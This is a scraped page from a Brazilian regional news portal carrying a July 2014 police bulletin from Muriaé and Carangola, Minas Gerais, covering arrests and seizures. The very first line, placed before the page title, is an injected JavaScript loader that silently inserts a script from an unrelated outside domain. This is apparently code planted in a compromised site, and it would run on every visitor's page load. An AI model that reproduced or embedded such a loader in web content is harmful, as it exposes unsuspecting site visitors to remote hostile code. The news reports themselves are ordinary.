;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Muriaé, Carangola e Região 29/07/14 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Muriaé, Carangola e Região 29/07/14

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 29/07/2014

                           75ª CIA PM- CARANGOLA-MG

PM DÁ CUMPRIMENTO A MANDADO DE BUSCA E EFETUA PRISÃO E APREENSÃO DE MATERIAIS EM TOMBOS

Em 28/07/2014, por volta das 09h30min, na Avenida Grilo, Bairro Niterói, durante cumprimento de mandado de busca e apreensão, foram apreendidos duas picadeiras, sendo uma de marca “PINHEIRO” e outra sem marca/ modelo, 01 motor marca “BROWN BOVERI”, 12 HP, série A538439 e 01 motor de indução monofásico 1/3CV, 3500 RPM, marca WEG, os quais, devido ao tamanho, ficaram apreendidos na responsabilidade de R.A.B.A.S. Sendo ainda dado cumprimento ao mandado de prisão em desfavor de C.O.S. de 35 anos, o qual foi conduzido à DPJ.

                        76ª CIA PM – MURIAÉ-MG

PM REGISTRA FALSIFICAÇÃO DE TALÃO DE CHEQUES DE PROPRIEDADE DA PREFEITURA DE PATROCÍNIO DO MURIAÉ

 Em 28/07/2014, por volta das 13h, na Rua Silveira Brum, no Centro, militares compareceram a prefeitura municipal, onde J.G.O.S. de 29 anos, relatou que foi comunicado por um funcionário da CAIXA ECONÔMICA FEDERAL que um cheque de propriedade da prefeitura municipal de PATROCÍNIO DO MURIAÉ-MG, no valor de R$1.001,00, foi depositado em nome de D.C.B. em data de 24 de julho de 2014, contudo, o talão de cheque original encontra-se na prefeitura, e ainda não chegou na numeração do cheque depositado e encontra-se na tesouraria da prefeitura, que não é a primeira vez que fato como esse acontece, chegando a conclusão que a citada folha foi falsificada.

PM EFETUA PRISÃO POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

Em 28/07/2014, por volta das 20h50min, na Rua Marius Dornelas, na Barra, segundo denúncias anônimas, E.C.S. de 36 anos, havia chegado no albergue, conduzindo um FORD/FIESTA, cor cinza, e que no interior do veículo teria uma arma de fogo. Em contato com um Agente Penitenciário, este o chamou no interior do albergue sendo que, ao ser questionado, disse que não tinha arma dentro do veículo, e negou a acompanhar a busca. O Agente Penitenciário acompanhou a busca no veículo, onde foi encontrado debaixo do banco do motorista um revólver cal.32 sem numeração aparente, TAURUS, municiado com 06 cartuchos intactos. O FORD/FIESTA foi removido ao pátio credenciado e dada voz de prisão ao autor, sendo conduzido à DPJ. Prisão Ratificada.

PM EFETUA PRISÃO POR DANO AO PATRIMÔNIO E TRÁFICO DE DROGAS EM MURIAÉ

 Em 28/07/2014, por volta das 23h45min, na Travessa Expedicionários, no Centro, denuncia anônima dava conta que havia um grupo de pessoas pichando o prédio da antiga prefeitura. No local encontraram pichações na cor rosa, e os autores tinham evadido. Em rastreamento, militares depararam com A.S.L. de 23 anos, P.E.B.F. de 18 anos, J.A.S. de 24 anos, e C.C.L.F. de 19 anos e, procedida a abordagem, foi encontrado ao lado dos pés de um dos indivíduos 01 tablete de maconha. Os indivíduos confirmaram que haviam acabado de fazer uso de maconha, tendo um deles assumido a propriedade da substância e afirmado que teria fornecido a droga gratuitamente aos demais indivíduos para que eles fizessem o consumo. Nas mãos dos autores foi constatado que havia resquício de tinta rosa e, diante da evidência, os indivíduos admitiram que estavam com os autores, mas alegaram que não teriam realizado as pichações, indicando o nome de A.H.O. de 14 anos, e J.C.J.M. de 14 anos, como os responsáveis pelos danos. Foi encontrado na porta da casa de um dos menores uma tampa de lata de tinta spray, na cor rosa, a qual foi recolhida. Em face das evidências, o outro menor, na presença de seu genitor, assumiu ter adquirido e levado a tinta até o local onde, junto com três dos indivíduos acima citados, teria realizado as pichações. A lata de tinta utilizada, foi localizada e recolhida. Foi dada voz de prisão em flagrante aos autores e de apreensão aos menores infratores, os quais foram encaminhados à DPJ. A perícia compareceu no local.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.